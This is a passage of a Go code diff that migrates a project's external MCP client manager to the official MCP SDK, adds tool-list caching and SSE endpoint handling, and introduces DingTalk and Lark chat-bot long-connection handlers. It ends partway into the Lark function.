// createSDKClient 根据配置创建并连接外部 MCP 客户端(使用官方 SDK),返回实现 ExternalMCPClient 的 *sdkClient
// 若连接失败返回 (nil, error)。ctx 用于连接超时与取消。
func createSDKClient(ctx context.Context, serverCfg config.ExternalMCPServerConfig, logger *zap.Logger) (ExternalMCPClient, error) {
timeout := time.Duration(serverCfg.Timeout) * time.Second
if timeout <= 0 {
timeout = 30 * time.Second
}
transport := serverCfg.Transport
if transport == "" {
if serverCfg.Command != "" {
transport = "stdio"
} else if serverCfg.URL != "" {
transport = "http"
} else {
return nil, fmt.Errorf("配置缺少 command 或 url")
}
}
client := mcp.NewClient(&mcp.Implementation{
Name: clientName,
Version: clientVersion,
}, nil)
var t mcp.Transport
switch transport {
case "stdio":
if serverCfg.Command == "" {
return nil, fmt.Errorf("stdio 模式需要配置 command")
}
// 必须用 exec.Command 而非 CommandContextdoConnect 返回后 ctx 会被 cancel
// 若用 CommandContext(ctx) 会立刻杀掉子进程,导致 ListTools 等后续请求失败、显示 0 工具
cmd := exec.Command(serverCfg.Command, serverCfg.Args...)
if len(serverCfg.Env) > 0 {
cmd.Env = append(cmd.Env, envMapToSlice(serverCfg.Env)...)
}
t = &mcp.CommandTransport{Command: cmd}
case "sse":
if serverCfg.URL == "" {
return nil, fmt.Errorf("sse 模式需要配置 url")
}
httpClient := httpClientWithTimeoutAndHeaders(timeout, serverCfg.Headers)
t = &mcp.SSEClientTransport{
Endpoint: serverCfg.URL,
HTTPClient: httpClient,
}
case "http":
if serverCfg.URL == "" {
return nil, fmt.Errorf("http 模式需要配置 url")
}
httpClient := httpClientWithTimeoutAndHeaders(timeout, serverCfg.Headers)
t = &mcp.StreamableClientTransport{
Endpoint: serverCfg.URL,
HTTPClient: httpClient,
}
case "simple_http":
// 简单 JSON-RPC HTTP:每次请求一次 POST、响应在 body。用于自建 MCP 或兼容旧端点(如 http://127.0.0.1:8081/mcp
if serverCfg.URL == "" {
return nil, fmt.Errorf("simple_http 模式需要配置 url")
}
return newSimpleHTTPClient(ctx, serverCfg.URL, timeout, serverCfg.Headers, logger)
default:
return nil, fmt.Errorf("不支持的传输模式: %s", transport)
}
session, err := client.Connect(ctx, t, nil)
if err != nil {
return nil, fmt.Errorf("连接失败: %w", err)
}
return newSDKClientFromSession(session, client, logger), nil
}
func envMapToSlice(env map[string]string) []string {
m := make(map[string]string)
for _, s := range os.Environ() {
if i := strings.IndexByte(s, '='); i > 0 {
m[s[:i]] = s[i+1:]
}
}
for k, v := range env {
m[k] = v
}
out := make([]string, 0, len(m))
for k, v := range m {
out = append(out, k+"="+v)
}
return out
}
func httpClientWithTimeoutAndHeaders(timeout time.Duration, headers map[string]string) *http.Client {
transport := http.DefaultTransport
if len(headers) > 0 {
transport = &headerRoundTripper{
headers: headers,
base: http.DefaultTransport,
}
}
return &http.Client{
Timeout: timeout,
Transport: transport,
}
}
type headerRoundTripper struct {
headers map[string]string
base http.RoundTripper
}
func (h *headerRoundTripper) RoundTrip(req *http.Request) (*http.Response, error) {
for k, v := range h.headers {
req.Header.Set(k, v)
}
return h.base.RoundTrip(req)
}
+203 -35
View File
@@ -25,6 +25,8 @@ type ExternalMCPManager struct {
errors map[string]string // 错误信息
toolCounts map[string]int // 工具数量缓存
toolCountsMu sync.RWMutex // 工具数量缓存的锁
toolCache map[string][]Tool // 工具列表缓存:MCP名称 -> 工具列表
toolCacheMu sync.RWMutex // 工具列表缓存的锁
stopRefresh chan struct{} // 停止后台刷新的信号
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
mu sync.RWMutex
@@ -46,6 +48,7 @@ func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage
stats: make(map[string]*ToolStats),
errors: make(map[string]string),
toolCounts: make(map[string]int),
toolCache: make(map[string][]Tool),
stopRefresh: make(chan struct{}),
}
// 启动后台刷新工具数量的goroutine
@@ -119,6 +122,11 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
delete(m.toolCounts, name)
m.toolCountsMu.Unlock()
// 清理工具列表缓存
m.toolCacheMu.Lock()
delete(m.toolCache, name)
m.toolCacheMu.Unlock()
return nil
}
@@ -196,8 +204,15 @@ func (m *ExternalMCPManager) StartClient(name string) error {
m.mu.Lock()
delete(m.errors, name)
m.mu.Unlock()
// 连接成功,立即刷新工具数量
// 立即刷新工具数量和工具列表缓存
m.triggerToolCountRefresh()
m.refreshToolCache(name, client)
// 2 秒后再刷新一次,覆盖 SSE/Streamable 等需稍等就绪的远端
go func() {
time.Sleep(2 * time.Second)
m.triggerToolCountRefresh()
m.refreshToolCache(name, client)
}()
}
}()
@@ -253,6 +268,11 @@ func (m *ExternalMCPManager) GetError(name string) string {
}
// GetAllTools 获取所有外部MCP的工具
// 优先从已连接的客户端获取,如果连接断开则返回缓存的工具列表
// 策略:
// - error 状态:不使用缓存,直接跳过(配置错误或服务不可用)
// - disconnected/connecting 状态:使用缓存(临时断开)
// - connected 状态:正常获取,失败时降级使用缓存
func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
m.mu.RLock()
clients := make(map[string]ExternalMCPClient)
@@ -262,17 +282,21 @@ func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
m.mu.RUnlock()
var allTools []Tool
for name, client := range clients {
if !client.IsConnected() {
continue
}
var hasError bool
var lastError error
tools, err := client.ListTools(ctx)
// 使用较短的超时时间进行快速检查(3秒),避免阻塞
quickCtx, quickCancel := context.WithTimeout(ctx, 3*time.Second)
defer quickCancel()
for name, client := range clients {
tools, err := m.getToolsForClient(name, client, quickCtx)
if err != nil {
m.logger.Warn("获取外部MCP工具列表失败",
zap.String("name", name),
zap.Error(err),
)
// 记录错误,但继续处理其他客户端
hasError = true
if lastError == nil {
lastError = err
}
continue
}
@@ -283,9 +307,97 @@ func (m *ExternalMCPManager) GetAllTools(ctx context.Context) ([]Tool, error) {
}
}
// 如果有错误但至少返回了一些工具,不返回错误(部分成功)
if hasError && len(allTools) == 0 {
return nil, fmt.Errorf("获取外部MCP工具失败: %w", lastError)
}
return allTools, nil
}
// getToolsForClient 获取指定客户端的工具列表
// 返回工具列表和错误(如果完全无法获取)
func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPClient, ctx context.Context) ([]Tool, error) {
status := client.GetStatus()
// error 状态:不使用缓存,直接返回错误
if status == "error" {
m.logger.Debug("跳过连接失败的外部MCP(不使用缓存)",
zap.String("name", name),
zap.String("status", status),
)
return nil, fmt.Errorf("外部MCP连接失败: %s", name)
}
// 已连接:尝试获取最新工具列表
if client.IsConnected() {
tools, err := client.ListTools(ctx)
if err != nil {
// 获取失败,尝试使用缓存
return m.getCachedTools(name, "连接正常但获取失败", err)
}
// 获取成功,更新缓存
m.updateToolCache(name, tools)
return tools, nil
}
// 未连接:根据状态决定是否使用缓存
if status == "disconnected" || status == "connecting" {
return m.getCachedTools(name, fmt.Sprintf("客户端临时断开(状态: %s", status), nil)
}
// 其他未知状态,不使用缓存
m.logger.Debug("跳过外部MCP(未知状态)",
zap.String("name", name),
zap.String("status", status),
)
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
}
// getCachedTools 获取缓存的工具列表
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
m.toolCacheMu.RLock()
cachedTools, hasCache := m.toolCache[name]
m.toolCacheMu.RUnlock()
if hasCache && len(cachedTools) > 0 {
m.logger.Debug("使用缓存的工具列表",
zap.String("name", name),
zap.String("reason", reason),
zap.Int("count", len(cachedTools)),
zap.Error(originalErr),
)
return cachedTools, nil
}
// 无缓存,返回错误
if originalErr != nil {
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
}
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
}
// updateToolCache 更新工具列表缓存
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
m.toolCacheMu.Lock()
m.toolCache[name] = tools
m.toolCacheMu.Unlock()
// 如果返回空列表,记录警告
if len(tools) == 0 {
m.logger.Warn("外部MCP返回空工具列表",
zap.String("name", name),
zap.String("hint", "服务可能暂时不可用,工具列表为空"),
)
} else {
m.logger.Debug("工具列表缓存已更新",
zap.String("name", name),
zap.Int("count", len(tools)),
)
}
}
// CallTool 调用外部MCP工具(返回执行ID)
func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args map[string]interface{}) (*ToolResult, string, error) {
// 解析工具名称:name::toolName
@@ -302,8 +414,18 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
return nil, "", fmt.Errorf("外部MCP客户端不存在: %s", mcpName)
}
// 检查连接状态,如果未连接或状态为error,不允许调用
if !client.IsConnected() {
return nil, "", fmt.Errorf("外部MCP客户端未连接: %s", mcpName)
status := client.GetStatus()
if status == "error" {
// 获取错误信息(如果有)
errorMsg := m.GetError(mcpName)
if errorMsg != "" {
return nil, "", fmt.Errorf("外部MCP连接失败: %s (错误: %s)", mcpName, errorMsg)
}
return nil, "", fmt.Errorf("外部MCP连接失败: %s", mcpName)
}
return nil, "", fmt.Errorf("外部MCP客户端未连接: %s (状态: %s)", mcpName, status)
}
// 创建执行记录
@@ -630,11 +752,20 @@ func (m *ExternalMCPManager) refreshToolCounts() {
cancel()
if err != nil {
m.logger.Debug("获取外部MCP工具数量失败",
zap.String("name", n),
zap.Error(err),
)
// 如果获取失败,保留旧值(在更新时处理)
errStr := err.Error()
// SSE 连接 EOF:远端可能关闭了流或未按规范在流上推送响应,仅首次用 Warn 提示
if strings.Contains(errStr, "EOF") || strings.Contains(errStr, "client is closing") {
m.logger.Warn("获取外部MCP工具数量失败(SSE 流已关闭或服务端未在流上返回 tools/list 响应)",
zap.String("name", n),
zap.String("hint", "若为 SSE 连接,请确认服务端保持 GET 流打开并按 MCP 规范以 event: message 推送 JSON-RPC 响应"),
zap.Error(err),
)
} else {
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
zap.String("name", n),
zap.Error(err),
)
}
resultChan <- countResult{name: n, count: -1} // -1 表示使用旧值
return
}
@@ -680,6 +811,40 @@ func (m *ExternalMCPManager) refreshToolCounts() {
m.toolCountsMu.Unlock()
}
// refreshToolCache 刷新指定MCP的工具列表缓存
func (m *ExternalMCPManager) refreshToolCache(name string, client ExternalMCPClient) {
if !client.IsConnected() {
return
}
// 检查状态,如果是error状态,不更新缓存
status := client.GetStatus()
if status == "error" {
m.logger.Debug("跳过刷新工具列表缓存(连接失败)",
zap.String("name", name),
zap.String("status", status),
)
return
}
// 使用较短的超时时间(5秒)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
tools, err := client.ListTools(ctx)
if err != nil {
m.logger.Debug("刷新工具列表缓存失败",
zap.String("name", name),
zap.Error(err),
)
// 刷新失败时不更新缓存,保留旧缓存(如果有)
return
}
// 使用统一的缓存更新方法
m.updateToolCache(name, tools)
}
// startToolCountRefresh 启动后台刷新工具数量的goroutine
func (m *ExternalMCPManager) startToolCountRefresh() {
m.refreshWg.Add(1)
@@ -707,21 +872,13 @@ func (m *ExternalMCPManager) triggerToolCountRefresh() {
go m.refreshToolCounts()
}
// createClient 创建客户端(不连接)
// createClient 创建客户端(不连接)。统一使用官方 MCP Go SDK 的 lazy 客户端,连接在 Initialize 时完成。
func (m *ExternalMCPManager) createClient(serverCfg config.ExternalMCPServerConfig) ExternalMCPClient {
timeout := time.Duration(serverCfg.Timeout) * time.Second
if timeout <= 0 {
timeout = 30 * time.Second
}
// 根据传输模式创建客户端
transport := serverCfg.Transport
if transport == "" {
// 如果没有指定transport,根据是否有command或url判断
if serverCfg.Command != "" {
transport = "stdio"
} else if serverCfg.URL != "" {
// 默认使用http,但可以通过transport字段指定sse
transport = "http"
} else {
return nil
@@ -733,17 +890,23 @@ func (m *ExternalMCPManager) createClient(serverCfg config.ExternalMCPServerConf
if serverCfg.URL == "" {
return nil
}
return NewHTTPMCPClient(serverCfg.URL, timeout, m.logger)
return newLazySDKClient(serverCfg, m.logger)
case "simple_http":
// 简单 HTTP(一次 POST 一次响应),用于自建 MCP 等
if serverCfg.URL == "" {
return nil
}
return newLazySDKClient(serverCfg, m.logger)
case "stdio":
if serverCfg.Command == "" {
return nil
}
return NewStdioMCPClient(serverCfg.Command, serverCfg.Args, serverCfg.Env, timeout, m.logger)
return newLazySDKClient(serverCfg, m.logger)
case "sse":
if serverCfg.URL == "" {
return nil
}
return NewSSEMCPClient(serverCfg.URL, timeout, m.logger)
return newLazySDKClient(serverCfg, m.logger)
default:
return nil
}
@@ -773,12 +936,7 @@ func (m *ExternalMCPManager) doConnect(name string, serverCfg config.ExternalMCP
// setClientStatus 设置客户端状态(通过类型断言)
func (m *ExternalMCPManager) setClientStatus(client ExternalMCPClient, status string) {
switch c := client.(type) {
case *HTTPMCPClient:
c.setStatus(status)
case *StdioMCPClient:
c.setStatus(status)
case *SSEMCPClient:
if c, ok := client.(*lazySDKClient); ok {
c.setStatus(status)
}
}
@@ -819,8 +977,13 @@ func (m *ExternalMCPManager) connectClient(name string, serverCfg config.Externa
zap.String("name", name),
)
// 连接成功,触发工具数量刷新
// 连接成功,触发工具数量刷新和工具列表缓存刷新
m.triggerToolCountRefresh()
m.mu.RLock()
if client, exists := m.clients[name]; exists {
m.refreshToolCache(name, client)
}
m.mu.RUnlock()
return nil
}
@@ -926,6 +1089,11 @@ func (m *ExternalMCPManager) StopAll() {
m.toolCounts = make(map[string]int)
m.toolCountsMu.Unlock()
// 清理所有工具列表缓存
m.toolCacheMu.Lock()
m.toolCache = make(map[string][]Tool)
m.toolCacheMu.Unlock()
// 停止后台刷新(使用 select 避免重复关闭 channel
select {
case <-m.stopRefresh:
+15 -37
View File
@@ -151,48 +151,26 @@ func TestExternalMCPManager_LoadConfigs(t *testing.T) {
}
}
func TestHTTPMCPClient_Initialize(t *testing.T) {
// 注意:这个测试需要一个真实的HTTP MCP服务器
// 如果没有服务器,这个测试会失败
// 在实际测试中,可以使用mock服务器
// TestLazySDKClient_InitializeFails 验证无效配置时 SDK 客户端 Initialize 失败并设置 error 状态
func TestLazySDKClient_InitializeFails(t *testing.T) {
logger := zap.NewNop()
client := NewHTTPMCPClient("http://127.0.0.1:8081/mcp", 5*time.Second, logger)
// 使用不存在的 HTTP 地址,Initialize 应失败
cfg := config.ExternalMCPServerConfig{
Transport: "http",
URL: "http://127.0.0.1:19999/nonexistent",
Timeout: 2,
}
c := newLazySDKClient(cfg, logger)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
// 这个测试可能会失败,如果没有真实的服务器
// 在实际环境中,应该使用mock服务器
err := client.Initialize(ctx)
if err != nil {
t.Logf("初始化失败(可能是没有服务器): %v", err)
err := c.Initialize(ctx)
if err == nil {
t.Fatal("expected error when connecting to invalid server")
}
status := client.GetStatus()
if status == "" {
t.Error("状态不应该为空")
if c.GetStatus() != "error" {
t.Errorf("expected status error, got %s", c.GetStatus())
}
client.Close()
}
func TestStdioMCPClient_Initialize(t *testing.T) {
// 注意:这个测试需要一个真实的stdio MCP服务器
// 如果没有服务器,这个测试会失败
logger := zap.NewNop()
client := NewStdioMCPClient("echo", []string{"test"}, nil, 5*time.Second, logger)
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel()
// 这个测试可能会失败,因为echo不是MCP服务器
// 在实际环境中,应该使用真实的MCP服务器或mock
err := client.Initialize(ctx)
if err != nil {
t.Logf("初始化失败(echo不是MCP服务器): %v", err)
}
client.Close()
c.Close()
}
func TestExternalMCPManager_StartStopClient(t *testing.T) {
+76 -10
View File
@@ -1,6 +1,7 @@
package mcp
import (
"bufio"
"context"
"encoding/json"
"fmt"
@@ -125,6 +126,13 @@ func (s *Server) HandleHTTP(w http.ResponseWriter, r *http.Request) {
return
}
// 官方 MCP SSE 规范:带 sessionid 的 POST 表示消息发往该 SSE 会话,响应通过 SSE 流返回
if sessionID := r.URL.Query().Get("sessionid"); sessionID != "" {
s.serveSSESessionMessage(w, r, sessionID)
return
}
// 简单 POST:请求体为 JSON-RPC,响应在 body 中返回
body, err := io.ReadAll(r.Body)
if err != nil {
s.sendError(w, nil, -32700, "Parse error", err.Error())
@@ -137,14 +145,56 @@ func (s *Server) HandleHTTP(w http.ResponseWriter, r *http.Request) {
return
}
// 处理消息
response := s.handleMessage(&msg)
w.Header().Set("Content-Type", "application/json")
json.NewEncoder(w).Encode(response)
}
// handleSSE 处理SSE连接(用于MCP HTTP传输的事件通道)
// serveSSESessionMessage 处理发往 SSE 会话的 POST:读取 JSON-RPC 请求,处理后将响应通过该会话的 SSE 流推送
func (s *Server) serveSSESessionMessage(w http.ResponseWriter, r *http.Request, sessionID string) {
s.mu.RLock()
client, exists := s.sseClients[sessionID]
s.mu.RUnlock()
if !exists || client == nil {
http.Error(w, "session not found", http.StatusNotFound)
return
}
body, err := io.ReadAll(r.Body)
if err != nil {
http.Error(w, "failed to read body", http.StatusBadRequest)
return
}
var msg Message
if err := json.Unmarshal(body, &msg); err != nil {
http.Error(w, "failed to parse body", http.StatusBadRequest)
return
}
response := s.handleMessage(&msg)
if response == nil {
w.WriteHeader(http.StatusAccepted)
return
}
respBytes, err := json.Marshal(response)
if err != nil {
http.Error(w, "failed to encode response", http.StatusInternalServerError)
return
}
select {
case client.send <- respBytes:
w.WriteHeader(http.StatusAccepted)
default:
http.Error(w, "session send buffer full", http.StatusServiceUnavailable)
}
}
// handleSSE 处理 SSE 连接,兼容官方 MCP 2024-11-05 SSE 规范:
// 1. 首个事件必须为 event: endpointdata 为客户端 POST 消息的 URL(含 sessionid
// 2. 后续事件为 event: messagedata 为 JSON-RPC 响应
func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
flusher, ok := w.(http.Flusher)
if !ok {
@@ -157,16 +207,25 @@ func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Connection", "keep-alive")
w.Header().Set("X-Accel-Buffering", "no")
sessionID := uuid.New().String()
client := &sseClient{
id: uuid.New().String(),
send: make(chan []byte, 8),
id: sessionID,
send: make(chan []byte, 32),
}
s.addSSEClient(client)
defer s.removeSSEClient(client.id)
// 发送初始ready事件,告知客户端连接成功
fmt.Fprintf(w, "event: message\ndata: {\"type\":\"ready\",\"status\":\"ok\"}\n\n")
// 官方规范:首个事件为 endpoint,data 为消息端点 URL(客户端将向该 URL POST 请求)
scheme := "http"
if r.TLS != nil {
scheme = "https"
}
if r.URL.Scheme != "" {
scheme = r.URL.Scheme
}
endpointURL := fmt.Sprintf("%s://%s%s?sessionid=%s", scheme, r.Host, r.URL.Path, sessionID)
fmt.Fprintf(w, "event: endpoint\ndata: %s\n\n", endpointURL)
flusher.Flush()
ticker := time.NewTicker(15 * time.Second)
@@ -183,7 +242,6 @@ func (s *Server) handleSSE(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "event: message\ndata: %s\n\n", msg)
flusher.Flush()
case <-ticker.C:
// 心跳保持连接
fmt.Fprintf(w, ": ping\n\n")
flusher.Flush()
}
@@ -311,6 +369,7 @@ func (s *Server) handleListTools(msg *Message) *Message {
tools = append(tools, tool)
}
s.mu.RUnlock()
s.logger.Debug("tools/list 请求", zap.Int("返回工具数", len(tools)))
response := ListToolsResponse{Tools: tools}
result, _ := json.Marshal(response)
@@ -1110,10 +1169,11 @@ func (s *Server) RegisterResource(resource *Resource) {
}
// HandleStdio 处理标准输入输出(用于 stdio 传输模式)
// MCP 协议使用换行分隔的 JSON-RPC 消息
// MCP 协议使用换行分隔的 JSON-RPC 消息;管道下需每次写入后 Flush,否则客户端会读不到响应
func (s *Server) HandleStdio() error {
decoder := json.NewDecoder(os.Stdin)
encoder := json.NewEncoder(os.Stdout)
stdout := bufio.NewWriter(os.Stdout)
encoder := json.NewEncoder(stdout)
// 注意:不设置缩进,MCP 协议期望紧凑的 JSON 格式
for {
@@ -1134,6 +1194,9 @@ func (s *Server) HandleStdio() error {
if err := encoder.Encode(errorMsg); err != nil {
return fmt.Errorf("发送错误响应失败: %w", err)
}
if err := stdout.Flush(); err != nil {
return fmt.Errorf("刷新 stdout 失败: %w", err)
}
continue
}
@@ -1149,6 +1212,9 @@ func (s *Server) HandleStdio() error {
if err := encoder.Encode(response); err != nil {
return fmt.Errorf("发送响应失败: %w", err)
}
if err := stdout.Flush(); err != nil {
return fmt.Errorf("刷新 stdout 失败: %w", err)
}
}
return nil
+44 -34
View File
@@ -1,11 +1,22 @@
package mcp
import (
"context"
"encoding/json"
"fmt"
"time"
)
// ExternalMCPClient 外部 MCP 客户端接口(由 client_sdk.go 基于官方 SDK 实现)
type ExternalMCPClient interface {
Initialize(ctx context.Context) error
ListTools(ctx context.Context) ([]Tool, error)
CallTool(ctx context.Context, name string, args map[string]interface{}) (*ToolResult, error)
Close() error
IsConnected() bool
GetStatus() string
}
// MCP消息类型
const (
MessageTypeRequest = "request"
@@ -29,21 +40,21 @@ func (m *MessageID) UnmarshalJSON(data []byte) error {
m.value = nil
return nil
}
// 尝试解析为字符串
var str string
if err := json.Unmarshal(data, &str); err == nil {
m.value = str
return nil
}
// 尝试解析为数字
var num json.Number
if err := json.Unmarshal(data, &num); err == nil {
m.value = num
return nil
}
return fmt.Errorf("invalid id type")
}
@@ -81,15 +92,15 @@ type Message struct {
// Error 表示MCP错误
type Error struct {
Code int `json:"code"`
Message string `json:"message"`
Code int `json:"code"`
Message string `json:"message"`
Data interface{} `json:"data,omitempty"`
}
// Tool 表示MCP工具定义
type Tool struct {
Name string `json:"name"`
Description string `json:"description"` // 详细描述
Description string `json:"description"` // 详细描述
ShortDescription string `json:"shortDescription,omitempty"` // 简短描述(用于工具列表,减少token消耗)
InputSchema map[string]interface{} `json:"inputSchema"`
}
@@ -127,9 +138,9 @@ type ClientInfo struct {
// InitializeResponse 初始化响应
type InitializeResponse struct {
ProtocolVersion string `json:"protocolVersion"`
Capabilities ServerCapabilities `json:"capabilities"`
ServerInfo ServerInfo `json:"serverInfo"`
ProtocolVersion string `json:"protocolVersion"`
Capabilities ServerCapabilities `json:"capabilities"`
ServerInfo ServerInfo `json:"serverInfo"`
}
// ServerCapabilities 服务器能力
@@ -178,31 +189,31 @@ type CallToolResponse struct {
// ToolExecution 工具执行记录
type ToolExecution struct {
ID string `json:"id"`
ToolName string `json:"toolName"`
Arguments map[string]interface{} `json:"arguments"`
Status string `json:"status"` // pending, running, completed, failed
Result *ToolResult `json:"result,omitempty"`
Error string `json:"error,omitempty"`
StartTime time.Time `json:"startTime"`
EndTime *time.Time `json:"endTime,omitempty"`
Duration time.Duration `json:"duration,omitempty"`
ID string `json:"id"`
ToolName string `json:"toolName"`
Arguments map[string]interface{} `json:"arguments"`
Status string `json:"status"` // pending, running, completed, failed
Result *ToolResult `json:"result,omitempty"`
Error string `json:"error,omitempty"`
StartTime time.Time `json:"startTime"`
EndTime *time.Time `json:"endTime,omitempty"`
Duration time.Duration `json:"duration,omitempty"`
}
// ToolStats 工具统计信息
type ToolStats struct {
ToolName string `json:"toolName"`
TotalCalls int `json:"totalCalls"`
SuccessCalls int `json:"successCalls"`
FailedCalls int `json:"failedCalls"`
ToolName string `json:"toolName"`
TotalCalls int `json:"totalCalls"`
SuccessCalls int `json:"successCalls"`
FailedCalls int `json:"failedCalls"`
LastCallTime *time.Time `json:"lastCallTime,omitempty"`
}
// Prompt 提示词模板
type Prompt struct {
Name string `json:"name"`
Description string `json:"description,omitempty"`
Arguments []PromptArgument `json:"arguments,omitempty"`
Name string `json:"name"`
Description string `json:"description,omitempty"`
Arguments []PromptArgument `json:"arguments,omitempty"`
}
// PromptArgument 提示词参数
@@ -257,11 +268,11 @@ type ResourceContent struct {
// SamplingRequest 采样请求
type SamplingRequest struct {
Messages []SamplingMessage `json:"messages"`
Model string `json:"model,omitempty"`
MaxTokens int `json:"maxTokens,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
TopP float64 `json:"topP,omitempty"`
Messages []SamplingMessage `json:"messages"`
Model string `json:"model,omitempty"`
MaxTokens int `json:"maxTokens,omitempty"`
Temperature float64 `json:"temperature,omitempty"`
TopP float64 `json:"topP,omitempty"`
}
// SamplingMessage 采样消息
@@ -272,9 +283,9 @@ type SamplingMessage struct {
// SamplingResponse 采样响应
type SamplingResponse struct {
Content []SamplingContent `json:"content"`
Model string `json:"model,omitempty"`
StopReason string `json:"stopReason,omitempty"`
Content []SamplingContent `json:"content"`
Model string `json:"model,omitempty"`
StopReason string `json:"stopReason,omitempty"`
}
// SamplingContent 采样内容
@@ -282,4 +293,3 @@ type SamplingContent struct {
Type string `json:"type"`
Text string `json:"text,omitempty"`
}
+6
View File
@@ -0,0 +1,6 @@
package robot
// MessageHandler 供飞书/钉钉长连接调用的消息处理接口(由 handler.RobotHandler 实现)
type MessageHandler interface {
HandleMessage(platform, userID, text string) string
}
+137
View File
@@ -0,0 +1,137 @@
package robot
import (
"bytes"
"context"
"encoding/json"
"net/http"
"strings"
"time"
"cyberstrike-ai/internal/config"
"github.com/open-dingtalk/dingtalk-stream-sdk-go/chatbot"
"github.com/open-dingtalk/dingtalk-stream-sdk-go/client"
dingutils "github.com/open-dingtalk/dingtalk-stream-sdk-go/utils"
"go.uber.org/zap"
)
const (
dingReconnectInitial = 5 * time.Second // 首次重连间隔
dingReconnectMax = 60 * time.Second // 最大重连间隔
)
// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
func StartDing(ctx context.Context, cfg config.RobotDingtalkConfig, h MessageHandler, logger *zap.Logger) {
if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" {
return
}
go runDingLoop(ctx, cfg, h, logger)
}
// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。
func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, h MessageHandler, logger *zap.Logger) {
backoff := dingReconnectInitial
for {
streamClient := client.NewStreamClient(
client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)),
client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get",
chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) {
go handleDingMessage(ctx, msg, h, logger)
return nil, nil
}).OnEventReceived),
)
logger.Info("钉钉 Stream 正在连接…", zap.String("client_id", cfg.ClientID))
err := streamClient.Start(ctx)
if ctx.Err() != nil {
logger.Info("钉钉 Stream 已按配置重启关闭")
return
}
if err != nil {
logger.Warn("钉钉 Stream 长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff))
}
select {
case <-ctx.Done():
return
case <-time.After(backoff):
// 下次重连间隔递增,上限 60 秒,避免频繁重试
if backoff < dingReconnectMax {
backoff *= 2
if backoff > dingReconnectMax {
backoff = dingReconnectMax
}
}
}
}
}
func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, h MessageHandler, logger *zap.Logger) {
if msg == nil || msg.SessionWebhook == "" {
return
}
content := ""
if msg.Text.Content != "" {
content = strings.TrimSpace(msg.Text.Content)
}
if content == "" && msg.Msgtype == "richText" {
if cMap, ok := msg.Content.(map[string]interface{}); ok {
if rich, ok := cMap["richText"].([]interface{}); ok {
for _, c := range rich {
if m, ok := c.(map[string]interface{}); ok {
if txt, ok := m["text"].(string); ok {
content = strings.TrimSpace(txt)
break
}
}
}
}
}
}
if content == "" {
logger.Debug("钉钉消息内容为空,已忽略", zap.String("msgtype", msg.Msgtype))
return
}
logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content))
userID := msg.SenderId
if userID == "" {
userID = msg.ConversationId
}
reply := h.HandleMessage("dingtalk", userID, content)
// 使用 markdown 类型以便正确展示标题、列表、代码块等格式
title := reply
if idx := strings.IndexAny(reply, "\n"); idx > 0 {
title = strings.TrimSpace(reply[:idx])
}
if len(title) > 50 {
title = title[:50] + "…"
}
if title == "" {
title = "回复"
}
body := map[string]interface{}{
"msgtype": "markdown",
"markdown": map[string]string{
"title": title,
"text": reply,
},
}
bodyBytes, _ := json.Marshal(body)
req, err := http.NewRequestWithContext(ctx, http.MethodPost, msg.SessionWebhook, bytes.NewReader(bodyBytes))
if err != nil {
logger.Warn("钉钉构造回复请求失败", zap.Error(err))
return
}
req.Header.Set("Content-Type", "application/json")
resp, err := http.DefaultClient.Do(req)
if err != nil {
logger.Warn("钉钉回复请求失败", zap.Error(err))
return
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
logger.Warn("钉钉回复非 200", zap.Int("status", resp.StatusCode))
return
}
logger.Debug("钉钉回复成功", zap.String("content_preview", reply))
}
+111
View File
@@ -0,0 +1,111 @@
package robot
import (
"context"
"encoding/json"
"strings"
"time"
"cyberstrike-ai/internal/config"
lark "github.com/larksuite/oapi-sdk-go/v3"
larkcore "github.com/larksuite/oapi-sdk-go/v3/core"
"github.com/larksuite/oapi-sdk-go/v3/event/dispatcher"
larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1"
larkws "github.com/larksuite/oapi-sdk-go/v3/ws"
"go.uber.org/zap"
)
const (
larkReconnectInitial = 5 * time.Second // 首次重连间隔
larkReconnectMax = 60 * time.Second // 最大重连间隔
)
type larkTextContent struct {
Text string `json:"text"`
}
// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。
// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。
func StartLark(ctx context.Context, cfg config.RobotLarkConfig, h MessageHandler, logger *zap.Logger) {
